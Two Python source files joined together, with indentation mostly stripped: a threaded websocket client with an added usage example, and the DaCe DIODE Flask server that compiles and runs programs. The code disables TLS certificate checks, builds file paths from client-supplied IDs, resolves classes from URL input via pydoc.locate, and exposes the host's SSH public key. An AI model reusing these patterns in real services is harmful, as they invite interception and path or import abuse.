"""
:param ping_interval: unit: seconds, type: int
"""
self.host = host
self.ping_interval = ping_interval # seconds
if header:
self.header = header
if proxy_host and proxy_port:
self.proxy_host = proxy_host
self.proxy_port = proxy_port
def start(self):
"""
Start the client. The on_connected callback is called after the websocket
is connected successfully.
Please don't send packets until the on_connected function is called.
"""
self._active = True
self._worker_thread = Thread(target=self._run)
self._worker_thread.start()
self._ping_thread = Thread(target=self._run_ping)
self._ping_thread.start()
def stop(self):
"""
Stop the client.
"""
self._active = False
self._disconnect()
def join(self):
"""
Wait till all threads finish.
This function cannot be called from worker thread or callback function.
"""
self._ping_thread.join()
self._worker_thread.join()
def send_packet(self, packet: dict):
"""
Send a packet (dict data) to the server.
Override this if you want to send a non-JSON packet.
"""
text = json.dumps(packet)
self._record_last_sent_text(text)
return self._send_text(text)
def _send_text(self, text: str):
"""
Send a text string to server.
"""
ws = self._ws
if ws:
ws.send(text, opcode=websocket.ABNF.OPCODE_TEXT)
def _send_binary(self, data: bytes):
"""
Send bytes data to server.
"""
ws = self._ws
if ws:
ws._send_binary(data)
def _reconnect(self):
""""""
if self._active:
self._disconnect()
self._connect()
def _create_connection(self, *args, **kwargs):
""""""
return websocket.create_connection(*args, **kwargs)
def _connect(self):
""""""
self._ws = self._create_connection(
self.host,
sslopt={"cert_reqs": ssl.CERT_NONE},
http_proxy_host=self.proxy_host,
http_proxy_port=self.proxy_port,
header=self.header
)
self.on_connected()
def _disconnect(self):
"""
"""
with self._ws_lock:
if self._ws:
self._ws.close()
self._ws = None
def _run(self):
"""
Keep running till stop is called.
"""
try:
self._connect()
# todo: onDisconnect
while self._active:
try:
ws = self._ws
if ws:
text = ws.recv()
# the ws object was closed while recv was blocking
if not text:
self._reconnect()
continue
self._record_last_received_text(text)
try:
data = self.unpack_data(text)
except ValueError as e:
print("websocket unable to parse data: " + text)
raise e
self.on_packet(data)
# ws is closed before recv function is called
# For socket.error, see Issue #1608
except (websocket.WebSocketConnectionClosedException, socket.error):
self._reconnect()
# other internal exception raised in on_packet
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._reconnect()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._reconnect()
@staticmethod
def unpack_data(data: str):
"""
Default serialization format is json.
Override this method if you want to use another serialization format.
"""
return json.loads(data)
def _run_ping(self):
""""""
while self._active:
try:
self._ping()
except: # noqa
et, ev, tb = sys.exc_info()
self.on_error(et, ev, tb)
self._reconnect()
for i in range(self.ping_interval):
if not self._active:
break
sleep(1)
def _ping(self):
""""""
ws = self._ws
if ws:
ws.send("ping", websocket.ABNF.OPCODE_PING)
@staticmethod
def on_connected():
"""
Callback when websocket is connected successfully.
"""
pass
@staticmethod
def on_disconnected():
"""
Callback when websocket connection is lost.
"""
pass
@staticmethod
def on_packet(packet: dict):
"""
Callback when receiving data from server.
"""
pass
def on_error(self, exception_type: type, exception_value: Exception, tb):
"""
Callback when exception raised.
"""
sys.stderr.write(
self.exception_detail(exception_type, exception_value, tb)
)
return sys.excepthook(exception_type, exception_value, tb)
def exception_detail(
self, exception_type: type, exception_value: Exception, tb
):
"""
Print detailed exception information.
"""
text = "[{}]: Unhandled WebSocket Error:{}\n".format(
datetime.now().isoformat(), exception_type
)
text += "LastSentText:\n{}\n".format(self._last_sent_text)
text += "LastReceivedText:\n{}\n".format(self._last_received_text)
text += "Exception trace: \n"
text += "".join(
traceback.format_exception(exception_type, exception_value, tb)
)
return text
def _record_last_sent_text(self, text: str):
"""
Record the last sent text for debugging purposes.
"""
self._last_sent_text = text[:1000]
def _record_last_received_text(self, text: str):
"""
Record the last received text for debugging purposes.
"""
self._last_received_text = text[:1000]
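# Editor's note: a minimal, hedged usage sketch for the client above. The host
# URL is an illustrative placeholder, not a real endpoint.
class EchoClient(WebsocketClient):
    """Prints every packet pushed by the server."""

    def on_connected(self):
        print("websocket connected")

    def on_packet(self, packet: dict):
        print("received:", packet)


if __name__ == "__main__":
    client = EchoClient()
    client.init(host="wss://example.com/ws", ping_interval=60)  # placeholder host
    client.start()      # spawns the worker and ping threads
    try:
        client.join()   # blocks until stop() is called from another thread
    except KeyboardInterrupt:
        client.stop()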
|
diode_server.py
|
#!flask/bin/python
# Copyright 2019-2020 ETH Zurich and the DaCe authors. All rights reserved.
import aenum
import dace
import dace.serialize
import dace.frontend.octave.parse as octave_frontend
from dace.codegen import codegen
from diode.DaceState import DaceState
from dace.transformation.optimizer import SDFGOptimizer
from dace.transformation.transformation import Transformation
from dace.sdfg.nodes import LibraryNode
import inspect
from flask import Flask, Response, request, redirect, url_for, abort, jsonify, send_from_directory, send_file
import json
import copy
import multiprocessing
import re
from diode.remote_execution import AsyncExecutor
import traceback
import os
import pydoc
import threading
import queue
import time
app = Flask(__name__)
# Prepare a whitelist of DaCe enumeration types
enum_list = [
typename
for typename, dtype in inspect.getmembers(dace.dtypes, inspect.isclass)
if issubclass(dtype, aenum.Enum)
]
es_ref = []
remote_execution = False
config_lock = threading.Lock()
RUNNING_TIMEOUT = 3
class ConfigCopy:
"""
Copied Config for passing by-value
"""
def __init__(self, config_values):
self._config = config_values
def get(self, *key_hierarchy):
current_conf = self._config
for key in key_hierarchy:
current_conf = current_conf[key]
return current_conf
def get_bool(self, *key_hierarchy):
from dace.config import _env2bool
res = self.get(*key_hierarchy)
if isinstance(res, bool):
return res
return _env2bool(str(res))
def set(self, *key_hierarchy, value=None, autosave=False):
raise Exception("ConfigCopy does not allow setting values!")
def save(self, path=None):
""" Nonstatic version of Config::save()
"""
if path is None:
path = Config._cfg_filename
# Write configuration file
with open(path, 'w') as f:
import yaml
yaml.dump(self._config, f, default_flow_style=False)
class ExecutorServer:
"""
Implements a server scheduling execution of dace programs
"""
def __init__(self):
self._command_queue = queue.Queue(
) # Fast command queue. Must be polled often (< 30 ms response time)
self._executor_queue = queue.Queue(
) # Run command queue. Latency not critical
_self = self
def helper():
_self.loop()
def ehelper():
_self.executorLoop()
self._task_dict = {}
self._run_num = 0
self._running = True
self._thread = threading.Thread(target=helper, daemon=True)
self._thread.start()
self._executor_thread = threading.Thread(target=ehelper, daemon=True)
self._executor_thread.start()
self._current_runs = {}
self._orphaned_runs = {}
self._oplock = threading.Lock()
self._run_cv = threading.Condition(
) # Used to trickle run tasks through (as the tasks are run in a thread)
self._slot_available = True # True if the target machine has a slot for running a program
self._perfdata_available = {} # Dict mapping client_id => .can-path
self._ticket_counter = 0
self._command_results = {} # Dict mapping ticket => command result
def executorLoop(self):
while self._running:
self.consume_programs()
def loop(self):
while self._running:
self.consume()
def waitForCommand(self, ticket):
while True:
try:
with self._oplock:
ret = self._command_results[ticket]
del self._command_results[ticket]
except:
time.sleep(2)
continue
return ret
def addCommand(self, cmd):
with self._oplock:
cmd['ticket'] = self._ticket_counter
self._ticket_counter += 1
self._command_queue.put(cmd)
print("Added command to queue")
return cmd['ticket']
def consume_programs(self):
try:
cmd = self._executor_queue.get(timeout=3)
if cmd['cmd'] == "run":
while True:
with self._run_cv:
if self._slot_available:
break
import time
time.sleep(0.5)
with self._run_cv:
self._slot_available = False
print("Running task")
self._task_dict[cmd['index']]['state'] = 'running'
runner = self.run(
cmd['cot'], {
'index': cmd['index'],
'config_path': cmd['config_path'],
'client_id': cmd['cid'],
'reset-perfdata': cmd['reset-perfdata'],
'perfopts': cmd['opt']['perfopts']
})
print("Wait for oplock")
with self._oplock:
self._current_runs[cmd['cid']] = runner
import time
# Wait a predefined time for clients to catch up on the outputs
time.sleep(RUNNING_TIMEOUT)
with self._oplock:
run_locally = True
try:
x = self._current_runs[cmd['cid']]
except:
run_locally = False
if run_locally:
print("running locally")
def tmp():
with self._oplock:
del self._current_runs[cmd['cid']]
try:
c = self._orphaned_runs[cmd['cid']]
except:
self._orphaned_runs[cmd['cid']] = []
self._orphaned_runs[cmd['cid']].append([])
print("Starting runner")
for x in runner():
self._orphaned_runs[cmd['cid']][-1] += x
# Because this holds locks (and the output should be generated even if nobody asks for it immediately), this is run when the timeout for direct interception expires
tmp()
elif cmd['cmd'] == 'control':
# Control operations that must be synchronous with execution (e.g. for cleanup, storage operations)
with self._oplock:
self._task_dict[cmd['index']]['state'] = 'running'
if cmd['operation'] == 'startgroup':
pass
elif cmd['operation'] == 'remove_group':
pass
elif cmd['operation'] == 'endgroup':
pass
with self._oplock:
del self._task_dict[cmd['index']]
except queue.Empty:
return
def consume(self):
try:
cmd = self._command_queue.get(timeout=3)
if isinstance(cmd, str):
pass
else:
command = cmd['cmd']
print("Got command " + command)
except queue.Empty:
return
def getExecutionOutput(self, client_id):
import time
ret = None
err_count = 0
while ret is None:
with self._oplock:
try:
ret = self._current_runs[client_id]
del self._current_runs[client_id]
except:
err_count += 1
if err_count < 20: # Give 20 seconds of space for compilation and distribution
time.sleep(1)
continue
def egen():
yield "ERROR: Failed to get run reference"
return egen
return ret
def stop(self):
self._running = False
def lock(self):
self._oplock.acquire()
def unlock(self):
self._oplock.release()
@staticmethod
def getPerfdataDir(client_id):
if not os.path.isdir("perfdata-dir/"):
os.mkdir("perfdata-dir")
tpath = "perfdata-dir/" + client_id
try:
os.mkdir(tpath)
except:
pass
perf_tmp_dir = tpath
return perf_tmp_dir
def addRun(self, client_id, compilation_output_tuple, more_options):
config_path = "./client_configs/" + client_id + ".conf"
if not os.path.isdir("./client_configs/"):
os.mkdir("./client_configs/")
if not os.path.isfile(config_path):
# Config not (yet) available, load default and copy
with config_lock:
from dace.config import Config
Config.load()
Config.save(config_path)
if isinstance(compilation_output_tuple, str):
# Group command
gc = compilation_output_tuple
val = {
'cid': client_id,
'cmd': 'control',
'index': self._run_num,
'operation': None,
'config_path': config_path,
'state': "pending"
}
if gc == "start":
val['operation'] = 'startgroup'
elif gc == "end":
val['operation'] = 'endgroup'
else:
def g():
yield '{ "error": "Unknown group operation" }'
return g
with self._oplock:
self._executor_queue.put(val)
self._task_dict[self._run_num] = val
self._run_num += 1
return
with self._oplock:
val = {
'index': self._run_num,
'type': 'run',
'cid': client_id,
'config_path': config_path,
'cmd': 'run',
'cot': compilation_output_tuple,
'opt': more_options,
'state': 'pending',
'reset-perfdata': False
}
self._executor_queue.put(val)
self._task_dict[self._run_num] = val
self._run_num += 1
def error_gen():
yield '{ "error": "Run was scheduled. Please poll until ready or longpoll." }'
return error_gen
def run(self, cot, options):
print("=> Run called")
print("Options: " + str(options))
compilation_output_tuple = cot
runindex = options['index']
config_path = options['config_path']
sdfgs, code_tuples, dace_state = compilation_output_tuple
# Passes output through HTTP1.1 streaming (using yield)
def runner():
print("Trying to get lock")
with self._run_cv:
yield "Run starting\n"
with config_lock:
from dace.config import Config
Config.load(config_path)
# Copy the config - this allows releasing the config lock
# without suffering from potential side effects
copied_config = ConfigCopy(Config._config)
self._slot_available = False
dace_state.set_is_compiled(False)
terminal_queue = multiprocessing.Queue()
async_executor = AsyncExecutor(remote=remote_execution)
async_executor.autoquit = True
async_executor.executor.output_queue = terminal_queue
async_executor.executor.set_config(copied_config)
async_executor.run_async(dace_state)
async_executor.to_proc_message_queue.put("forcequit")
while async_executor.running_proc.is_alive():
try:
new = terminal_queue.get(timeout=1)
yield new
except:
# Check if the sub-process is still running
continue
# Flush remaining outputs
while not terminal_queue.empty():
new = terminal_queue.get(timeout=1)
yield new
with self._oplock:
# Delete from the tasklist
del self._task_dict[runindex]
# Output instrumentation report, if exists
if (async_executor.running_proc.exitcode == 0
and dace_state.sdfg.is_instrumented()):
report = dace_state.sdfg.get_latest_report()
yield '\nInstrumentation report:\n%s\n\n' % report
yield ('Run finished with exit code %d' %
async_executor.running_proc.exitcode)
self._slot_available = True
return runner
@app.route('/')
def redirect_base():
return redirect(url_for("index", path="index.html"), code=301)
@app.route('/webclient/<path:path>', methods=['GET'])
def index(path):
"""
This is an http server (on the same port as the REST API).
It serves the files from the 'webclient'-directory to user agents.
Note: This is NOT intended for production environments and security is disregarded!
"""
return send_from_directory(
os.path.join(os.path.dirname(os.path.abspath(__file__)), "webclient"),
path)
@app.route('/dace/api/v1.0/getPubSSH/', methods=['GET'])
def getPubSSH():
try:
with open(os.path.expanduser("~/.ssh/id_rsa.pub")) as f:
key = f.read()
return jsonify({"pubkey": key})
except:
print("Failed to open keyfile")
traceback.print_exc()
return jsonify({"pubkey": "0"})
@app.route('/dace/api/v1.0/getEnum/<string:name>', methods=['GET'])
def getEnum(name):
"""
Helper function to enumerate the available values of a whitelisted DaCe enumeration type (e.g. `ScheduleType`).
Returns:
enum: List of string-representations of the values in the enum
"""
valid_params = enum_list
if name not in valid_params:
# To protect against arbitrary code execution, this request is refused
print("Enum type '" + str(name) + "' is not in Whitelist")
abort(400)
return jsonify(
{'enum': [str(e).split(".")[-1] for e in getattr(dace.dtypes, name)]})
@app.route('/dace/api/v1.0/getLibImpl/<string:name>', methods=['GET'])
def get_library_implementations(name):
"""
Helper function to enumerate available implementations for a given
library node.
Returns:
enum: List of string-representations of implementations
"""
cls = pydoc.locate(name)
if cls is None:
return jsonify([])
return jsonify(list(cls.implementations.keys()))
@app.route('/dace/api/v1.0/expand/', methods=['POST'])
def expand_node_or_sdfg():
"""
Performs expansion of a single library node or an entire SDFG.
Fields:
sdfg (required): SDFG as JSON
nodeid (not required): A list of: [SDFG ID, state ID, node ID]
"""
try:
sdfg = dace.SDFG.from_json(request.json['sdfg'])
except KeyError:
return jsonify({'error': 'SDFG not given'})
try:
sdfg_id, state_id, node_id = request.json['nodeid']
except KeyError:
sdfg_id, state_id, node_id = None, None, None
if sdfg_id is None:
sdfg.expand_library_nodes()
else:
context_sdfg = sdfg.sdfg_list[sdfg_id]
state = context_sdfg.node(state_id)
node = state.node(node_id)
if isinstance(node, LibraryNode):
node.expand(context_sdfg, state)
else:
return jsonify({'error': 'The given node is not a library node'})
return jsonify({'sdfg': sdfg.to_json()})
def collect_all_SDFG_nodes(sdfg):
ret = []
for sid, state in enumerate(sdfg.nodes()):
for nid, node in enumerate(state.nodes()):
ret.append(('s' + str(sid) + '_' + str(nid), node))
return ret
def split_nodeid_in_state_and_nodeid(nodeid):
match = re.match(r"s(\d+)_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), int(ids[1])
else:
match = re.match(r"dummy_(\d+)", nodeid)
if match:
ids = match.groups()
return int(ids[0]), None
else:
raise ValueError("Node ID " + nodeid + " has the wrong form")
def properties_to_json_list(props):
ret = []
for x, val in props:
try:
typestr = x.dtype.__name__
except:
# Try again, it might be an enum
try:
typestr = x.enum.__name__
except:
typestr = 'None'
# Special case of CodeProperty
if isinstance(x, dace.properties.CodeProperty):
typestr = "CodeProperty"
if val is None:
continue
val = x.to_string(val)
# Special case of DebugInfoProperty: Transcribe to object (this is read-only)
if isinstance(x, dace.properties.DebugInfoProperty):
typestr = "DebugInfo"
if val is None:
continue
nval = {
"filename": val.filename,
"start_line": val.start_line,
"end_line": val.end_line,
"start_col": val.start_column,
"end_col": val.end_column
}
val = json.dumps(nval)
ret.append({
"name": str(x.attr_name),
"desc": str(x.desc),
"type": typestr,
"default": str(x.default),
"value": str(val)
})
return ret
def applySDFGProperty(sdfg, property_element, step=None):
try:
prop_step = int(property_element['step'])
except:
print("[Warning] Prop step was not provided")
prop_step = 0
print("applySDFGProperty: step " + str(step) + ", prop_step: " +
str(prop_step))
if step is not None and prop_step != step:
# Step mismatch; ignore
return sdfg
sid = int(property_element['state_id'])
nid = int(property_element['node_id'])
node = sdfg.node(sid).node(nid)
for prop in property_element['params']:
dace.serialize.set_properties_from_json(node, prop, context=sdfg)
return sdfg
def applySDFGProperties(sdfg, properties, step=None):
for x in properties:
applySDFGProperty(sdfg, x, step)
return sdfg
def applyOptPath(sdfg, optpath, useGlobalSuffix=True, sdfg_props=None):
# Iterate over the path, applying the transformations
global_counter = {}
sdfg_props = sdfg_props or []
step = 0
for x in optpath:
optimizer = SDFGOptimizer(sdfg, inplace=True)
name = x['name']
classname = name[:name.index('$')] if name.find('$') >= 0 else name
transformation = next(t for t in Transformation.extensions().keys()
if t.__name__ == classname)
matching = optimizer.get_pattern_matches(patterns=[transformation])
# Apply properties (will automatically apply by step-matching)
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
for pattern in matching:
name = type(pattern).__name__
tsdfg = sdfg.sdfg_list[pattern.sdfg_id]
if useGlobalSuffix:
if name in global_counter:
global_counter[name] += 1
else:
global_counter[name] = 0
tmp = global_counter[name]
if tmp > 0:
name += "$" + str(tmp)
if name == x['name']:
#for prop in x['params']['props']:
#if prop['name'] == 'subgraph': continue
#set_properties_from_json(pattern, prop, sdfg)
dace.serialize.set_properties_from_json(pattern,
x['params']['props'],
context=sdfg)
pattern.apply_pattern(tsdfg)
if not useGlobalSuffix:
break
step += 1
sdfg = applySDFGProperties(sdfg, sdfg_props, step)
return sdfg
def create_DaceState(code, sdfg_dict, errors):
dace_state = None
try:
dace_state = DaceState(code, "fake.py", remote=remote_execution)
for x in dace_state.sdfgs:
name, sdfg = x
sdfg_dict[name] = sdfg
return dace_state
except SyntaxError as se:
# Syntax error
errors.append({
'type': "SyntaxError",
'line': se.lineno,
'offset': se.offset,
'text': se.text,
'msg': se.msg
})
except ValueError as ve:
# DACE-Specific error
tb = traceback.format_exc()
errors.append({
'type': "ValueError",
'stringified': str(ve),
'traceback': tb
})
except Exception as ge:
# Generic exception
tb = traceback.format_exc()
errors.append({
'type': ge.__class__.__name__,
'stringified': str(ge),
'traceback': tb
})
return dace_state
def compileProgram(request, language, perfopts=None):
if not request.json or (('code' not in request.json) and
('sdfg' not in request.json)):
print("[Error] No input code provided, cannot continue")
abort(400)
errors = []
try:
optpath = request.json['optpath']
except:
optpath = None
try:
sdfg_props = request.json['sdfg_props']
except:
sdfg_props = None
if perfopts is None:
try:
perf_mode = request.json['perf_mode']
except:
perf_mode = None
else:
#print("Perfopts: " + str(perfopts))
perf_mode = perfopts
client_id = request.json['client_id']
sdfg_dict = {}
sdfg_eval_order = []
with config_lock: # Lock the config - the config may be modified while holding this lock, but the config MUST be restored.
from dace.config import Config
config_path = "./client_configs/" + client_id + ".conf"
if os.path.isfile(config_path):
Config.load(config_path)
else:
Config.load()
dace_state = None
in_sdfg = None
if "sdfg" in request.json:
in_sdfg = request.json['sdfg']
if isinstance(in_sdfg, list):
if len(in_sdfg) > 1:
# TODO: Allow multiple sdfg inputs
raise NotImplementedError("More than 1 SDFG provided")
in_sdfg = in_sdfg[0]
if isinstance(in_sdfg, str):
in_sdfg = json.loads(in_sdfg)
if isinstance(in_sdfg, dict):
# Generate callbacks (needed for elements referencing others)
def loader_callback(name: str):
# Check if already available and if yes, return it
if name in sdfg_dict:
return sdfg_dict[name]
# Else: This function has to recreate the given sdfg
sdfg_dict[name] = dace.SDFG.from_json(
in_sdfg[name], {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(name)
return sdfg_dict[name]
for k, v in in_sdfg.items():
# Leave it be if the sdfg was already created
# (this might happen with SDFG references)
if k in sdfg_dict: continue
if isinstance(v, str):
v = json.loads(v)
sdfg_dict[k] = dace.SDFG.from_json(
v, {
'sdfg': None,
'callback': loader_callback
})
sdfg_eval_order.append(k)
else:
in_sdfg = dace.SDFG.from_json(in_sdfg)
sdfg_dict[in_sdfg.name] = in_sdfg
else:
print("Using code to compile")
code = request.json['code']
if (isinstance(code, list)):
if len(code) > 1:
print("More than 1 code file provided!")
abort(400)
code = code[0]
if language == "octave":
statements = octave_frontend.parse(code, debug=False)
statements.provide_parents()
statements.specialize()
sdfg = statements.generate_code()
sdfg.set_sourcecode(code, "matlab")
elif language == "dace":
dace_state = create_DaceState(code, sdfg_dict, errors)
# The DaceState keys sdfg_dict by the variable names used in the dace code; re-key it by SDFG name instead
copied_dict = {}
for k, v in sdfg_dict.items():
copied_dict[v.name] = v
sdfg_dict = copied_dict
if len(errors) == 0:
if optpath is not None:
for sdfg_name, op in optpath.items():
try:
sp = sdfg_props[sdfg_name]
except:
# In any error case, just ignore the properties
sp = None
print("Applying opts for " + sdfg_name)
print("Dict: " + str(sdfg_dict.keys()))
sdfg_dict[sdfg_name] = applyOptPath(sdfg_dict[sdfg_name],
op,
sdfg_props=sp)
code_tuple_dict = {}
# Deep-copy the SDFG (codegen may change the SDFG it operates on)
codegen_sdfgs = copy.deepcopy(sdfg_dict)
codegen_sdfgs_dace_state = copy.deepcopy(sdfg_dict)
if len(errors) == 0:
if sdfg_eval_order:
sdfg_eval = [(n, codegen_sdfgs[n])
for n in reversed(sdfg_eval_order)]
else:
sdfg_eval = codegen_sdfgs.items()
for n, s in sdfg_eval:
try:
if Config.get_bool('diode', 'general',
'library_autoexpand'):
s.expand_library_nodes()
code_tuple_dict[n] = codegen.generate_code(s)
except dace.sdfg.NodeNotExpandedError as ex:
code_tuple_dict[n] = [str(ex)]
except Exception: # Forward exception to output code
code_tuple_dict[n] = [
'Code generation failed:\n' + traceback.format_exc()
]
if dace_state is None:
if "code" in request.json:
in_code = request.json['code']
else:
in_code = ""
dace_state = DaceState(in_code, "tmp.py", remote=remote_execution)
dace_state.set_sdfg(
list(codegen_sdfgs_dace_state.values())[0],
list(codegen_sdfgs_dace_state.keys())[0])
if len(dace_state.errors) > 0:
print("ERRORS: " + str(dace_state.errors))
errors.extend(dace_state.errors)
# The config won't save back on its own, and we don't want it to - these changes are transient
if len(errors) > 0:
return errors
# Only return top-level SDFG
return ({k: v
for k, v in sdfg_dict.items()
if v.parent is None}, code_tuple_dict, dace_state)
#return sdfg_dict, code_tuple_dict, dace_state
def get_transformations(sdfgs):
opt_per_sdfg = {}
for sdfg_name, sdfg in sdfgs.items():
opt = SDFGOptimizer(sdfg)
ptrns = opt.get_pattern_matches()
optimizations = []
for p in ptrns:
label = type(p).__name__
nodeids = []
properties = []
if p is not None:
sdfg_id = p.sdfg_id
sid = p.state_id
nodes = list(p.subgraph.values())
for n in nodes:
nodeids.append([sdfg_id, sid, n])
properties = dace.serialize.all_properties_to_json(p)
optimizations.append({
'opt_name': label,
'opt_params': properties,
'affects': nodeids,
'children': []
})
opt_per_sdfg[sdfg_name] = {'matching_opts': optimizations}
return opt_per_sdfg
@app.route("/dace/api/v1.0/dispatcher/<string:op>/", methods=['POST'])
def execution_queue_query(op):
es = es_ref[0]
if op == "list":
# List the currently waiting tasks
retlist = []
for key, val in es._orphaned_runs.items():
tmp = [''.join(x) for x in val]
for x in tmp:
d = {}
d['index'] = '(done)'
d['type'] = 'orphan'
d['client_id'] = key
d['state'] = 'orphaned'
d['output'] = str(x)
retlist.append(d)
for key, val in es._task_dict.items():
d = {}
if val['cmd'] == 'run':
d['index'] = key
d['type'] = 'run'
d['client_id'] = val['cid']
d['options'] = val['opt']
d['state'] = val['state']
elif val['cmd'] == 'control':
d['index'] = key
d['type'] = 'command'
d['client_id'] = val['cid']
d['options'] = val['operation']
d['state'] = val['state']
retlist.append(d)
ret = {}
ret['elements'] = retlist
return jsonify(ret)
else:
print("Error: op " + str(op) + " not implemented")
abort(400)
@app.route('/dace/api/v1.0/run/status/', methods=['POST'])
def get_run_status():
if not request.json or not 'client_id' in request.json:
print("[Error] No client id provided, cannot continue")
abort(400)
es = es_ref[0]
# getExecutionOutput returns a generator to output to a HTTP1.1 stream
outputgen = es.getExecutionOutput(request.json['client_id'])
return Response(outputgen(), mimetype='text/text')
@app.route('/dace/api/v1.0/run/', methods=['POST'])
def run():
"""
This function is equivalent to the old DIODE "Run"-Button.
POST-Parameters:
(Same as for compile(), language defaults to 'dace')
perfmodes: list including every queried mode
corecounts: list of core counts (one run for every number of cores)
"""
try:
perfmodes = request.json['perfmodes']
except:
perfmodes = ["noperf"]
try:
corecounts = request.json['corecounts']
except:
corecounts = [0]
try:
repetitions = request.json['repetitions']
except:
repetitions = 1
# Obtain the reference
es = es_ref[0]
client_id = request.json['client_id']
es.addRun(client_id, "start", {})
for pmode in perfmodes:
perfopts = {
'mode': pmode,
'core_counts': corecounts,
'repetitions': repetitions
}
tmp = compileProgram(request, 'dace', perfopts)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# ERROR
print("An error occurred")
abort(400)
dace_state.repetitions = repetitions
more_options = {}
more_options['perfopts'] = perfopts
runner = es.addRun(client_id, (sdfgs, code_tuples, dace_state),
more_options)
es.addRun(client_id, "end", {})
# There is no state information with this, just the output
# It might be necessary to add a special field that the client has to filter out
# to provide additional state information
return Response(runner(), mimetype="text/text")
@app.route('/dace/api/v1.0/match_optimizer_patterns/', methods=['POST'])
def optimize():
"""
Returns a list of possible optimizations (transformations) and their properties.
POST-Parameters:
input_code: list. Contains all necessary input code files
optpath: list of dicts, as { name: <str>, params: <dict> }. Contains the current optimization path/tree.
This optpath is applied to the provided code before evaluating possible pattern matches.
client_id: For identification. May be unique across all runs,
must be unique across clients
:return: matching_opts: list of dicts, as { opt_name: <str>, opt_params: <dict>, affects: <list>, children: <recurse> }.
Contains the matching transformations.
`affects` is a list of affected node ids, which must be unique in the current program.
"""
tmp = compileProgram(request, 'dace')
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opt_per_sdfg = get_transformations(sdfgs)
return jsonify(opt_per_sdfg)
@app.route('/dace/api/v1.0/compile/<string:language>', methods=['POST'])
def compile(language):
"""
POST-Parameters:
sdfg: ser. sdfg: Contains the root SDFG, serialized in JSON-string. If set, options `code` and `sdfg_props` are taken from this value.
Can be a list of SDFGs.
NOTE: If specified, `code`, `sdfg_prop`, and `language` (in URL) are ignored.
code: string/list. Contains all necessary input code files
[opt] optpath: list of dicts, as { <sdfg_name/str>: { name: <str>, params: <dict> }}. Contains the current optimization path/tree.
This optpath is applied to the provided code before compilation
[opt] sdfg_props: list of dicts, as { <sdfg_name/str>: { state_id: <str>, node_id: <str>, params: <dict>, step: <opt int>}}. Contains changes to the default SDFG properties.
The step element of the dicts is optional. If it is provided, it specifies the number
of optpath elements that precede it. E.g. a step value of 0 means that the property is applied before the first optimization.
If it is omitted, the property is applied after all optimization steps, i.e. to the resulting SDFG
[opt] perf_mode: string. Providing "null" has the same effect as omission. If specified, enables performance instrumentation with the counter set
provided in the DaCe settings. If null (or omitted), no instrumentation is enabled.
client_id: <string>: For later identification. May be unique across all runs,
must be unique across clients
Returns:
sdfg: object. Contains a serialization of the resulting SDFGs.
generated_code: string. Contains the output code
sdfg_props: object. Contains a dict of all properties for
every existing node of the sdfgs returned
in the sdfg field
"""
tmp = None
try:
tmp = compileProgram(request, language)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opts = get_transformations(sdfgs)
compounds = {}
for n, s in sdfgs.items():
compounds[n] = {
"sdfg":
s.to_json(),
"matching_opts":
opts[n]['matching_opts'],
"generated_code":
[*map(lambda x: getattr(x, 'code', str(x)), code_tuples[n])]
}
return jsonify({"compounds": compounds})
except Exception as e:
return jsonify({'error': str(e), 'traceback': traceback.format_exc()})
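# Editor's note: a hedged client-side sketch of the /compile/<language> route
# above; it is not part of the original DIODE server. It assumes the server is
# reachable on Flask's default port 5000 and that `requests` is installed.
def _example_compile_request(code: str, client_id: str = "example-client"):
    import requests  # third-party HTTP client, assumed available
    resp = requests.post(
        "http://localhost:5000/dace/api/v1.0/compile/dace",
        json={"code": [code], "client_id": client_id},
    )
    payload = resp.json()
    # On success the payload holds a "compounds" dict keyed by SDFG name, each
    # entry containing the serialized SDFG, the matching transformations and
    # the generated code; on failure it holds "error" (and possibly "traceback").
    return payload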
@app.route('/dace/api/v1.0/diode/themes', methods=['GET'])
def get_available_ace_editor_themes():
import glob, os.path
path = "./webclient/external_lib/ace/"
files = [f for f in glob.glob(path + "theme-*.js")]
filenames = map(os.path.basename, files)
return jsonify([*filenames])
def get_settings(client_id, name="", cv=None, config_path=""):
from dace.config import Config
if cv is None:
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
if cv is None:
cv = Config.get()
ret = {}
for i, (cname, cval) in enumerate(sorted(cv.items())):
cpath = tuple(list(config_path) + [cname])
try:
meta = Config.get_metadata(*cpath)
# A dict contains more elements
if meta['type'] == 'dict':
ret[cname] = {
"value": get_settings(client_id, cname, cval, cpath),
"meta": meta
}
continue
# Other values can be included directly
ret[cname] = {"value": cval, "meta": meta}
except KeyError:
print('WARNING: No metadata for configuration key', cpath)
return ret
def set_settings(settings_array, client_id):
from dace.config import Config
if not os.path.isdir("./client_configs"):
os.mkdir("./client_configs/")
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
for path, val in settings_array.items():
path = path.split("/")
Config.set(*path, value=val)
Config.save(clientpath)
return Config.get()
@app.route('/dace/api/v1.0/preferences/<string:operation>', methods=['POST'])
def diode_settings(operation):
if operation == "get":
client_id = request.json['client_id']
return jsonify(get_settings(client_id))
elif operation == "set":
print("request.data: " + str(request.data))
settings = request.json
client_id = settings['client_id']
del settings['client_id']
return jsonify(set_settings(settings, client_id))
else:
return jsonify({"error": "Unsupported operation"})
@app.route('/dace/api/v1.0/status', methods=['POST'])
def status():
# just a kind of ping/pong to see if the server is running
return "OK"
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument("-l",
"--localhost",
action="store_true",
help="Bind to localhost only")
parser.add_argument("-r",
"--remotedace",
action="store_true",
help="Use ssh commands instead of locally running dace")
parser.add_argument("-rd",
"--restoredace",
action="store_true",
help="Restore the backup file")
parser.add_argument(
"-e",
"--executor",
action="store_true",
help="Run as an executor server instead of DIODE server")
parser.add_argument("-p", "--port", type=int, help="Port to listen on")
args = parser.parse_args()
if args.restoredace:
from dace.config import Config
Config.load("./dace.conf.bak")
Config.save()
remote_execution = args.remotedace
es = ExecutorServer()
